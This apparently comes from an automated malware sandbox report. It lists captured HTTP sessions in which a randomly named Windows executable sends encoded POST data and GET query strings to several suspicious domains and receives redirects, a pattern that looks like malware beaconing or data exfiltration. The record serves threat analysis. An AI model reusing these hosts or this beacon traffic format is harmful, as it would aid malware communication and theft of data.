                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 2d 4c 3d 6b 42 4d 78 5a 46 52 70 41 44 36 50 26 67 50 3d 31 68 59 4f 58 67 79 6d 2f 2b 48 39 6c 65 76 41 6b 72 34 45 43 56 36 72 4f 59 4b 5a 59 33 67 4c 41 75 42 45 50 53 46 6d 4e 42 57 57 31 55 6f 42 47 6d 37 6b 72 4d 61 6b 6f 49 66 32 54 38 50 43 62 61 6b 47 6b 35 63 4a 59 73 4b 39 49 7a 39 30 66 2b 42 79 33 65 69 2b 6e 46 37 4b 68 5a 59 58 67 54 59 30 70 56 67 7a 55 75 38 6b 42 35 66 6c 2b 78 6a 6b 75 4f 63 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?-L=kBMxZFRpAD6P&gP=1hYOXgym/+H9levAkr4ECV6rOYKZY3gLAuBEPSFmNBWW1UoBGm7krMakoIf2T8PCbakGk5cJYsK9Iz90f+By3ei+nF7KhZYXgTY0pVgzUu8kB5fl+xjkuOc="}</script></head></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1192.168.2.114998223.224.37.76803000C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 15:55:10.579591990 CEST721OUTPOST /8z5k/ HTTP/1.1
                                                                                                      Host: www.1183377.app
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Length: 199
                                                                                                      Origin: http://www.1183377.app
                                                                                                      Referer: http://www.1183377.app/8z5k/
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Data Raw: 67 50 3d 2f 33 79 6d 58 72 5a 75 73 51 2f 74 72 2b 34 33 68 4f 5a 54 39 46 6d 68 35 33 41 64 48 38 6d 51 6b 64 75 67 41 4e 49 5a 7a 58 52 62 4a 55 66 55 5a 46 6c 49 45 4b 64 32 61 43 38 68 6c 46 42 2f 76 53 65 57 63 78 32 30 58 44 43 36 6e 63 70 6e 45 78 61 65 5a 78 57 33 67 57 4a 71 6d 42 36 57 75 4f 78 73 72 36 55 55 56 30 37 6b 53 2b 56 68 64 5a 6e 47 31 43 6f 42 35 50 61 72 6f 79 78 48 46 4d 51 58 4e 41 2f 6a 62 5a 78 4b 43 39 72 6e 50 49 72 6a 37 6d 35 61 37 67 45 63 45 4f 68 75 36 59 66 43 4a 70 54 73 58 54 63 43 70 47 6f 68 33 76 64 6c 79 7a 6e 43 71 68 77 5a 49 37 58 6e 5a 67 3d 3d
                                                                                                      Data Ascii: gP=/3ymXrZusQ/tr+43hOZT9Fmh53AdH8mQkdugANIZzXRbJUfUZFlIEKd2aC8hlFB/vSeWcx20XDC6ncpnExaeZxW3gWJqmB6WuOxsr6UUV07kS+VhdZnG1CoB5ParoyxHFMQXNA/jbZxKC9rnPIrj7m5a7gEcEOhu6YfCJpTsXTcCpGoh3vdlyznCqhwZI7XnZg==


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2192.168.2.114998323.224.37.76803000C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 15:55:13.140261889 CEST741OUTPOST /8z5k/ HTTP/1.1
                                                                                                      Host: www.1183377.app
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Length: 219
                                                                                                      Origin: http://www.1183377.app
                                                                                                      Referer: http://www.1183377.app/8z5k/
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Data Raw: 67 50 3d 2f 33 79 6d 58 72 5a 75 73 51 2f 74 78 65 6f 33 78 64 78 54 30 46 6d 69 38 33 41 64 63 73 6d 71 6b 64 71 67 41 4e 67 4a 79 6b 31 62 4d 45 76 55 59 41 46 49 46 4b 64 32 56 69 39 72 71 6c 42 32 76 53 54 72 63 7a 69 30 58 48 53 36 6e 63 35 6e 46 43 43 64 57 42 57 31 31 47 4a 6f 6f 68 36 57 75 4f 78 73 72 35 6f 36 56 30 7a 6b 54 4b 70 68 64 34 6e 4a 71 79 6f 4f 78 76 61 72 73 79 78 44 46 4d 51 68 4e 46 58 46 62 62 35 4b 43 34 50 6e 50 5a 72 6b 77 6d 35 41 32 41 46 76 46 72 45 36 69 72 71 68 4b 61 69 64 66 67 52 6a 6f 41 35 37 6e 4d 55 79 78 67 76 41 2b 48 52 70 42 4b 79 75 43 74 62 78 59 45 61 77 30 56 7a 64 68 79 69 63 67 48 35 57 63 65 51 3d
                                                                                                      Data Ascii: gP=/3ymXrZusQ/txeo3xdxT0Fmi83AdcsmqkdqgANgJyk1bMEvUYAFIFKd2Vi9rqlB2vSTrczi0XHS6nc5nFCCdWBW11GJooh6WuOxsr5o6V0zkTKphd4nJqyoOxvarsyxDFMQhNFXFbb5KC4PnPZrkwm5A2AFvFrE6irqhKaidfgRjoA57nMUyxgvA+HRpBKyuCtbxYEaw0VzdhyicgH5WceQ=


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      3192.168.2.114998423.224.37.76803000C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 15:55:15.694778919 CEST1754OUTPOST /8z5k/ HTTP/1.1
                                                                                                      Host: www.1183377.app
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Length: 1231
                                                                                                      Origin: http://www.1183377.app
                                                                                                      Referer: http://www.1183377.app/8z5k/
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Data Raw: 67 50 3d 2f 33 79 6d 58 72 5a 75 73 51 2f 74 78 65 6f 33 78 64 78 54 30 46 6d 69 38 33 41 64 63 73 6d 71 6b 64 71 67 41 4e 67 4a 79 6b 39 62 4d 56 50 55 5a 68 46 49 47 4b 64 32 63 43 39 71 71 6c 41 6b 76 53 61 67 63 7a 75 43 58 42 4f 36 68 2b 42 6e 43 7a 43 64 42 52 57 31 71 32 4a 74 6d 42 37 63 75 4f 68 6f 72 35 34 36 56 30 7a 6b 54 4d 4e 68 62 70 6e 4a 6f 79 6f 42 35 50 61 2f 6f 79 78 76 46 4d 59 66 4e 46 62 7a 62 71 5a 4b 43 59 66 6e 4e 72 7a 6b 39 6d 35 65 36 67 46 33 46 72 41 4d 69 76 4b 58 4b 62 48 77 66 6e 64 6a 6f 68 4d 6e 2f 66 6f 65 72 77 57 30 76 31 42 37 62 50 4b 4b 44 75 66 43 4a 58 57 6f 32 67 72 4d 71 41 62 77 30 46 70 58 48 49 66 55 51 54 43 4d 65 5a 50 71 37 77 32 39 78 7a 2b 77 69 6b 49 33 66 34 61 43 37 34 78 76 36 50 56 4a 45 74 63 41 51 74 6b 4f 47 73 4c 47 42 6c 57 48 38 55 43 36 6b 42 63 78 35 6d 45 58 54 4d 76 75 55 35 6a 4b 4e 38 36 67 65 6c 34 39 32 4a 73 74 54 41 34 52 66 73 31 56 4b 59 6d 67 72 44 51 74 79 4b 58 4e 2f 65 73 7a 48 4d 43 43 74 5a 4d 57 59 63 6f 34 33 72 58 [TRUNCATED]
                                                                                                      Data Ascii: gP=/3ymXrZusQ/txeo3xdxT0Fmi83AdcsmqkdqgANgJyk9bMVPUZhFIGKd2cC9qqlAkvSagczuCXBO6h+BnCzCdBRW1q2JtmB7cuOhor546V0zkTMNhbpnJoyoB5Pa/oyxvFMYfNFbzbqZKCYfnNrzk9m5e6gF3FrAMivKXKbHwfndjohMn/foerwW0v1B7bPKKDufCJXWo2grMqAbw0FpXHIfUQTCMeZPq7w29xz+wikI3f4aC74xv6PVJEtcAQtkOGsLGBlWH8UC6kBcx5mEXTMvuU5jKN86gel492JstTA4Rfs1VKYmgrDQtyKXN/eszHMCCtZMWYco43rX3eI3Hcj4C2kCWxtgUf4H8qOTMputbExa9jWMWSUt5Vao3ViUviGNjBuyx18SuDyteabt1y7ufEwJ1leRRVWRAcCNEG15NBODAytEo02R5K4ylDhfRe36kE0XkndPKsg9PMZmO2M4P1Jih91S0dHc1gG3uzJncGknISswIl54Avmnfnifm2OTDKWqVxgpiikNXZW8mSAZMz2QCgWld5McpQGFaNMxjS5YYXss5i3nIhng2CKPs/h8fo4rZjXV1PsYXx0TWa4BKXnoHPL7xtANzbKnmnGq1uzdAfsUb3L+tB2Uhuo98ICZDRmE9pk6I8ZUdcTBfR8gCSXUz9HGTk1i2Zs8K/4TZCsyZbKj+Eo6SC7Zqh3DiF6/rbjkT9YesrEyY0ojt8FgQTiCkDb/cBVjeBVtedFB+wmusEtSOky8YF4ptnGFJKwjRVL0pM0EAi4Y6ED5O04TIk/i7pmJyB7cLaVl5vNmF25L2vU0LNSocdFgl+1cvDR0Mq9yBfLRPdRg1djD9v68u8CAesuoHLsfF6XgxF8hBFW+k97HLOfsSOXmlFXBKKeIL82LsRHOaRaQgsFPeNd2k9KfGxihLNRmQjqIyDatOvvFcDav9zbDHqKmip31F0Lru/XoAwaGxfEY3NpdCE9qVJZUuGy+NiApUbEWHDHrbiJoil [TRUNCATED]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      4192.168.2.114998523.224.37.76803000C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 15:55:18.235976934 CEST459OUTGET /8z5k/?gP=y1aGUeBTtCWB8PYjxeZy4U2j9UMFcfikuJGyOOgv6AsofEnOPQxTGp57UW4jl24PiU2QUCC/WnCbrv11FxPlakKzrkp/pGyXsuE4toY6QkeuA/Y2UZTirzw=&-L=kBMxZFRpAD6P HTTP/1.1
                                                                                                      Host: www.1183377.app
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      5192.168.2.114998620.184.53.162803000C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 15:55:24.280472040 CEST715OUTPOST /4i87/ HTTP/1.1
                                                                                                      Host: www.52ywq.vip
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Length: 199
                                                                                                      Origin: http://www.52ywq.vip
                                                                                                      Referer: http://www.52ywq.vip/4i87/
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Data Raw: 67 50 3d 67 56 64 41 4d 2f 57 70 30 7a 36 78 65 4f 61 38 76 37 46 34 51 75 31 71 73 5a 51 31 55 56 72 56 31 36 76 30 51 34 46 63 4c 55 54 66 53 58 33 49 30 46 79 42 78 6a 48 51 49 61 73 42 68 75 68 57 67 77 58 6a 6c 4f 2f 66 62 50 70 46 4f 46 79 31 32 5a 33 44 67 39 30 61 71 48 31 44 71 49 77 58 63 66 67 73 4d 33 50 5a 54 49 62 56 78 68 55 38 4b 44 45 6a 79 58 47 43 45 44 38 48 63 57 6d 6c 47 49 4d 73 4a 5a 69 54 57 77 6f 63 6a 49 4f 61 56 4d 48 66 6c 75 67 4d 37 58 4a 54 64 66 38 58 71 6c 39 79 67 6d 4a 66 74 5a 35 55 32 34 68 46 6f 61 4b 65 51 2b 73 6b 2b 72 75 66 48 7a 73 73 78 67 3d 3d
                                                                                                      Data Ascii: gP=gVdAM/Wp0z6xeOa8v7F4Qu1qsZQ1UVrV16v0Q4FcLUTfSX3I0FyBxjHQIasBhuhWgwXjlO/fbPpFOFy12Z3Dg90aqH1DqIwXcfgsM3PZTIbVxhU8KDEjyXGCED8HcWmlGIMsJZiTWwocjIOaVMHflugM7XJTdf8Xql9ygmJftZ5U24hFoaKeQ+sk+rufHzssxg==
                                                                                                      Oct 8, 2024 15:55:25.355673075 CEST359INHTTP/1.1 301 Moved Permanently
                                                                                                      Date: Tue, 08 Oct 2024 13:55:25 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 166
                                                                                                      Connection: close
                                                                                                      Location: https://6329.vhjhbv.com/4i87/
                                                                                                      Server: CDNRay
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      6192.168.2.114998720.184.53.162803000C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 15:55:26.821927071 CEST735OUTPOST /4i87/ HTTP/1.1
                                                                                                      Host: www.52ywq.vip
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Length: 219
                                                                                                      Origin: http://www.52ywq.vip
                                                                                                      Referer: http://www.52ywq.vip/4i87/
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Data Raw: 67 50 3d 67 56 64 41 4d 2f 57 70 30 7a 36 78 59 76 4b 38 38 6f 74 34 62 75 31 72 78 70 51 31 61 31 72 52 31 36 7a 30 51 39 6b 52 4c 47 48 66 53 32 48 49 33 48 61 42 32 6a 48 51 44 36 73 45 76 4f 67 55 67 77 4c 52 6c 4c 48 66 62 4c 4a 46 4f 41 65 31 32 75 6a 45 68 74 31 38 6e 6e 31 64 33 59 77 58 63 66 67 73 4d 33 61 30 54 4c 72 56 79 55 63 38 4e 52 73 6b 74 6e 47 42 4e 6a 38 48 59 57 6d 35 47 49 4e 35 4a 62 57 70 57 32 73 63 6a 4b 47 61 56 5a 6e 41 77 65 67 4b 2f 58 49 52 52 73 52 6e 6d 30 6b 54 72 56 46 43 73 74 31 47 7a 2b 77 66 34 35 44 4a 54 74 6b 6d 71 4e 50 76 4f 43 4a 6c 71 73 4f 39 71 62 31 4b 4f 6b 47 44 34 49 37 4a 52 44 72 57 69 64 49 3d
                                                                                                      Data Ascii: gP=gVdAM/Wp0z6xYvK88ot4bu1rxpQ1a1rR16z0Q9kRLGHfS2HI3HaB2jHQD6sEvOgUgwLRlLHfbLJFOAe12ujEht18nn1d3YwXcfgsM3a0TLrVyUc8NRsktnGBNj8HYWm5GIN5JbWpW2scjKGaVZnAwegK/XIRRsRnm0kTrVFCst1Gz+wf45DJTtkmqNPvOCJlqsO9qb1KOkGD4I7JRDrWidI=
                                                                                                      Oct 8, 2024 15:55:27.906780005 CEST359INHTTP/1.1 301 Moved Permanently
                                                                                                      Date: Tue, 08 Oct 2024 13:55:27 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 166
                                                                                                      Connection: close
                                                                                                      Location: https://6329.vhjhbv.com/4i87/
                                                                                                      Server: CDNRay
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      7192.168.2.114998820.184.53.162803000C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 15:55:29.931057930 CEST1748OUTPOST /4i87/ HTTP/1.1
                                                                                                      Host: www.52ywq.vip
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Length: 1231
                                                                                                      Origin: http://www.52ywq.vip
                                                                                                      Referer: http://www.52ywq.vip/4i87/
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Data Raw: 67 50 3d 67 56 64 41 4d 2f 57 70 30 7a 36 78 59 76 4b 38 38 6f 74 34 62 75 31 72 78 70 51 31 61 31 72 52 31 36 7a 30 51 39 6b 52 4c 47 66 66 53 45 50 49 6c 67 47 42 33 6a 48 51 64 4b 73 46 76 4f 68 4d 67 77 44 56 6c 4c 44 68 62 4e 46 46 63 79 57 31 77 61 50 45 6f 74 31 38 34 33 31 63 71 49 77 6e 63 65 4d 6f 4d 30 69 30 54 4c 72 56 79 56 73 38 65 6a 45 6b 2b 33 47 43 45 44 38 62 63 57 6d 46 47 4a 6c 70 4a 62 54 65 57 47 4d 63 6a 71 57 61 5a 4b 50 41 73 4f 67 49 34 58 49 7a 52 73 64 34 6d 30 49 35 72 57 59 70 73 71 78 47 7a 37 38 41 6c 4b 72 51 41 63 6f 41 39 2b 6a 70 46 77 4e 63 69 66 43 57 71 4a 74 6f 65 68 2f 65 37 4a 57 5a 46 42 6e 2b 39 61 71 58 68 41 68 77 39 6b 78 4a 6b 70 53 51 6f 70 75 6e 4d 34 5a 77 46 54 4e 63 59 4f 30 2f 64 64 62 2b 67 49 51 7a 34 63 2b 54 73 51 38 35 69 63 57 62 52 2b 65 49 53 78 58 4f 77 35 4d 64 55 41 67 70 4d 53 77 75 55 2f 4c 30 67 37 4f 4f 31 33 44 76 77 44 73 36 6b 37 77 62 4d 52 37 72 34 5a 48 54 34 7a 54 5a 35 53 4c 4a 62 6f 53 51 62 34 4c 4e 4e 34 6c 5a 54 65 42 [TRUNCATED]
                                                                                                      Data Ascii: gP=gVdAM/Wp0z6xYvK88ot4bu1rxpQ1a1rR16z0Q9kRLGffSEPIlgGB3jHQdKsFvOhMgwDVlLDhbNFFcyW1waPEot18431cqIwnceMoM0i0TLrVyVs8ejEk+3GCED8bcWmFGJlpJbTeWGMcjqWaZKPAsOgI4XIzRsd4m0I5rWYpsqxGz78AlKrQAcoA9+jpFwNcifCWqJtoeh/e7JWZFBn+9aqXhAhw9kxJkpSQopunM4ZwFTNcYO0/ddb+gIQz4c+TsQ85icWbR+eISxXOw5MdUAgpMSwuU/L0g7OO13DvwDs6k7wbMR7r4ZHT4zTZ5SLJboSQb4LNN4lZTeBqPFfbMLnt9igmfiUL2EBrPLeOUpN6pmnyo1MtTwD8w4pgzAX02vap/wV0qM60mXIanzQw17PxAVWYrK6M9oya0plFCSLhFhn6VCT9CNctCp/33fFZOjszzb4sYzmcWZ1kjOahaW6vM6/pSxCM+N2982t9QMwy8gv/IA6TQtVrgFJQwcyIV5WWAIo7dN3T9BcCY9ualKi7JMdDaZndr6VXexSsXmvmTBB2SXJOL5zPDvc6m77AWmbsTBmajn8At+E9jZufxgMpXUQ0rZz91wxaUv/xGx91BoMsz42mx6rvtuAlCvgDOs8THir2SXsn20pcnyfsPHsPHZaZSM3Q8B/CoD0fXu84ptGDf5f6K7PUUSGuPSXK0JQ2dM8hefTg+Lhz1jSBAnLUTgGwibkTFtYSFcnmYjdzL3ZGMbQfLpLZrI5fHHHu9kjYJhuGFu3+aRi2S+XwPOXzMWautsf2MPtYglmP4j03SbVz5s9f8ZfILUVX6MCi4RU2OMw9BpkrRvTPo0yYmo4RkxEkvKuclUwWVZW9i6NQ9bBHZG8621tFTlu1Yhog5VItFw3KHEmu8eXAPYAooUCD4Zba570KL+KeboYnu2FnyluwW5kZh/UTOaZnEyeHcfTlu10k0gfi75IjOBy5dBOOY0JB+8QQ5pVnwZJawppUNoXE4 [TRUNCATED]
                                                                                                      Oct 8, 2024 15:55:31.023698092 CEST359INHTTP/1.1 301 Moved Permanently
                                                                                                      Date: Tue, 08 Oct 2024 13:55:30 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 166
                                                                                                      Connection: close
                                                                                                      Location: https://6329.vhjhbv.com/4i87/
                                                                                                      Server: CDNRay
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      8192.168.2.114998920.184.53.162803000C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 15:55:32.468439102 CEST457OUTGET /4i87/?-L=kBMxZFRpAD6P&gP=tX1gPPm4vGDAfdGb/LV0WNIl4Jkrf3fdzqWbffI0WxOtalbv2UCR6RvwOqtQuPJgvEbTjd3YUbROaC6Ux6KVpZIGkHJVy9sLRLBvFWiGcqamlVlCdw8MyQ8= HTTP/1.1
                                                                                                      Host: www.52ywq.vip
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Oct 8, 2024 15:55:33.552191019 CEST499INHTTP/1.1 301 Moved Permanently
                                                                                                      Date: Tue, 08 Oct 2024 13:55:33 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 166
                                                                                                      Connection: close
                                                                                                      Location: https://6329.vhjhbv.com/4i87/?-L=kBMxZFRpAD6P&gP=tX1gPPm4vGDAfdGb/LV0WNIl4Jkrf3fdzqWbffI0WxOtalbv2UCR6RvwOqtQuPJgvEbTjd3YUbROaC6Ux6KVpZIGkHJVy9sLRLBvFWiGcqamlVlCdw8MyQ8=
                                                                                                      Server: CDNRay
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      9192.168.2.1149990199.192.21.169803000C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 15:55:39.003246069 CEST724OUTPOST /d8cw/ HTTP/1.1
                                                                                                      Host: www.zenscape.top
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Length: 199
                                                                                                      Origin: http://www.zenscape.top
                                                                                                      Referer: http://www.zenscape.top/d8cw/
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
